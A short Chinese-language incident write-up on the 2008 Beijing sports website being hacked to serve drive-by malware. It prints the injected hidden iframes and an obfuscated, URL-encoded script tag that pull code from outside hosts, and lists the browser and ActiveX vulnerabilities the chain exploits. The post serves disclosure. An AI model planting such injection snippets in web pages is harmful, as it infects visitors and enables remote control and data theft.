2008北京体育网挂马事件

标签:
挂马this漏洞active控件style北京it |
2008北京体育网挂马事件(http://www.2008beijing.net/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
<iframe marginheight="0" height="100" width="584" scrolling="no" src="yushubin/1.htm"></iframe>
http://www.2008beijing.net/yushubin/1.htm问题框架代码:
<script o src=http://%61%64%73%2E%32%30%2D%31%32%2E%63%6E/ad/ad.js?id=s></script>
http://ads.20-12.cn/ad/ad.js?id=s问题框架代码:
<iframe src=http:\/\/ubbbb.com.cn\/12\/zz.htm width=50 height=0><\/iframe>
http://ubbbb.com.cn/12/zz.htm问题框架代码
<iframe src="index.htm" width=111 height=0 border=0></iframe>
http://ubbbb.com.cn/12/index.htm问题框架代码
MS06-014漏洞
MS08-041漏洞
MS09-002漏洞
暴风影音播放器MPS.StormPlayer漏洞
联众世界GLIEDown2.dll Active控件溢出漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
Adobe Flash Player SWF文件漏洞